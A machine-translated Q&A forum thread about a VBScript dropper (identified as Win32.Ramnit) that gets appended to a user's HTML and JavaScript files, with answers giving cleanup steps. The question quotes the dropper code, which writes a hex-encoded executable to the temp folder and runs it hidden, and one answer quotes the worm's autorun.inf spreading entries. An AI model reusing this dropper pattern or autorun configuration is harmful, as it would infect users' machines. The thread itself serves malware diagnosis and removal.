这段VB代码是如何自动添加的
How is this piece of VB code getting added automatically?
每当我在Notepad++中打开JavaScript(.js)或HTML(.HTML)文件几天后,类似的VB脚本就会自动添加到最后。我强烈感觉这是某种病毒,有人能指导我吗?
</html> // My file ends here......
<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A90000300000004000 ...... {lots of numbers}
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "'" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT><!-- .... {Lots of junk characters here } -->
它运行的文件是%temp%''svchost.exe.
因此,做一个任务列表
tasklist /svc /fi "imagename eq svchost.exe"
记下没有任何包含服务的svchosts。输入xxxx 的实际PID
taskkill /pid xxxx /pid xxxx /pid xxxx /f
这将停止特定部分的运行。
病毒使用的技术不会可靠地工作,尤其是在非英语窗口上。
此外,在清除可能存在的其他部分之前,更改安全性以防止执行,而不是删除它。
icacls "%temp%'svchost.exe" /deny Everyone:F
这适用于Vista,但广泛适用于所有版本。
病毒清洗
如果您在正常模式下执行这些操作时遇到问题。尝试在网络安全模式下进行此操作。
单击开始-所有程序-附件-运行并键入
msconfig
然后转到引导选项卡,单击安全引导,并勾选网络。重新启动。返回此处并取消选中"安全引导"以返回正常模式。
安全扫描仪
Microsoft安全扫描程序是一个免费下载的安全工具,提供按需扫描并帮助删除病毒、间谍软件和其他恶意软件。它可以与您现有的防病毒软件配合使用。
http://www.microsoft.com/security/scanner/en-au/default.aspx
恶意软件删除工具
如果你无法下载或运行安全扫描程序,Windows内置了一个小型防病毒程序。它只针对最常见的威胁。它将要更新,不要让它更新。运行它而不更新。然后再次运行它,这次更新它。
单击开始-所有程序-附件-运行(或按Winkey+R)。类型
mrt
重置防火墙
您可以将防火墙重置为默认设置。
开始-所有程序-附件-右键单击命令提示符,然后选择以管理员身份运行。键入(或通过在"命令提示"窗口中右键单击并选择"粘贴"来复制和粘贴)。
netsh advfirewall reset export "%userprofile%'desktop'Firewall Settings.wfw"
安全修复
修复程序是对Microsoft的程序进行故障排除。其中有27个。
自动修复Windows安全设置以确保您的电脑的安全
http://support.microsoft.com/mats/Malware_Prevention/en-us
和
修复安全问题以自动保护和保护Windows
http://support.microsoft.com/mats/windows_security_diagnostic/en-us
和
修复Internet Explorer问题,使IE快速、安全、稳定地进行
http://support.microsoft.com/mats/ie_performance_and_safety/en-us
完整列表请访问
http://support.microsoft.com/fixit/en-us
当您选择下载它时,请选择在另一台计算机上运行的选项。然后你可以把它保存到硬盘上的一个文件夹里。打开文件夹,打开文件夹FixitPortable,然后运行LaunchFixIt。它将包含所有27个Fixit。
全职防病毒
对于永久性的防病毒,我们在论坛上注意到,使用Microsoft Security Essentials的人完全没有问题。
http://www.microsoft.com/en-au/download/details.aspx?id=5201
如果其他全部失败
这个来自微软的程序引导另一个基本操作系统来清理Windows。你需要把它放在USB或DVD上,然后从它启动。
http://windows.microsoft.com/en-US/windows/what-is-windows-defender-offline
查找有关威胁的详细信息
微软有一个病毒信息百科全书。
http://www.microsoft.com/security/portal/threat/threats.aspx
我还认为您的系统受到了一些病毒的影响。我想分享一个我遇到的与你的问题相匹配的链接,请浏览,我会在这里发布链接-->http://www.webdeveloper.com/forum/showthread.php?287131-VBScript自动插入HTML页面
我认为这是一种病毒。
所以,如果你没有防病毒软件,你需要安装。
我推荐免费的:Microsoft Security Essentials或Avast。
此外,您可以下载专门的防病毒实用程序,只用于扫描,而不是安装它-Dr.Web CureIt!
然后对你的电脑进行全面扫描。
您应该检查所有启动命令并删除所有恶意命令。例如CCleaner Free可以帮助您检查它们。
UPD清理并删除启动命令后,可以使用sfc
实用程序。
Microsoft Windows资源检查器
扫描所有受保护系统文件的完整性,并用正确的Microsoft版本替换不正确的版本。
使用管理员权限运行cmd
,然后运行sfc /scannow
命令。
这是一种名为Win32.Ramnit的病毒阅读此处的描述:
https://www.virustotal.com/#/file/fd6c69c345f1e32924f0a5bb7393e191b393a78d58e2c6413b03ced7482f2320/detection
我刚刚在我客户的一台电脑上发现了这种病毒,这种病毒修改了我USB便携式硬盘中的所有html文件。
这个脚本执行VBScript来创建一个文件并执行它,并在这个文件夹中安装一个程序:
C:'Program Files'Microsoft'DesktopLayer.exe
阅读更多:http://greatis.com/blog/how-to-remove-malware/desktoplayer-exe-virus-ramnit.htm
对于你插入这台受感染的电脑的每一个U盘,病毒都会创建2个文件:
autorun.inf
'RECYCLER'<random GUID>'<random charx8>.exe
autorun.inf:的内容
[autorun]
action=Open
icon=%WinDir%'system32'shell32.dll,4
shellexecute=.'RECYCLER'S-0-8-75-3728445372-7281148451-227621134-4236'ZDqdQKMm.exe
shell'explore'command=.'RECYCLER'S-0-8-75-3728445372-7281148451-227621134-4236'ZDqdQKMm.exe
USEAUTOPLAY=1
shell'Open'command=.'RECYCLER'S-0-8-75-3728445372-7281148451-227621134-4236'ZDqdQKMm.exe
当这个pendrive被插入另一台计算机时,它试图执行病毒安装程序。
- 如何将新用户自动添加到AddThis服务以设置分析服务
- HTML图像未加载(自动添加内联css和属性)
- JavaScript功能不会自动添加具有价格的文本框
- 如何自动添加target=“_空白“;仅限于外部链接
- 自动添加然后POST的HTML表单
- 将按钮自动添加到行表中
- 为什么我的 init() 函数没有运行?(安装 Firefox 扩展时自动添加工具栏按钮,但仅在首次运行时)
- 浏览器会自动添加-Tag,而无需JavaScript
- 当用户在移动浏览器中复制 Web 内容时,如何自动添加版权
- 在javascript中自动添加带有十进制值的金额
- 如何在火狐中删除自动添加的脚本
- 是否可以阻止requireJS自动添加.js文件扩展名
- 整页.js:如何自动添加下一节或上一节的名称
- 如何运行新窗口.打开并自动添加 Ctrl 键
- 如何在函数调用中自动添加参数
- 自动添加Facebook社交插件:“喜欢”或“关注”
- 删除自动添加的 xmlns 属性
- 自动添加尼沃灯箱
- 将文本自动添加到mailto:link中加载的电子邮件中
- 如何通过输入自动添加数字